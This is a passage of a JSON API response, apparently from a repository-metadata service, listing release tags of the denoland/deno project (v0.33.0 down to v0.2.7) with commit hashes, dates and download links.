kg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2F